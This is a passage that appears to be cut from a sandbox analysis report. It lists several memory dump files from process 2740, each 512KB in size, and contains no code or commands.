          Filesize

          512KB

        • memory/2740-265-0x0000000000400000-0x0000000000480000-memory.dmp

          Filesize

          512KB

        • memory/2740-266-0x0000000000400000-0x0000000000480000-memory.dmp

          Filesize

          512KB

        • memory/2740-267-0x0000000000400000-0x0000000000480000-memory.dmp

          Filesize

          512KB

        • memory/2740-268-0x0000000000400000-0x0000000000480000-memory.dmp

          Filesize

          512KB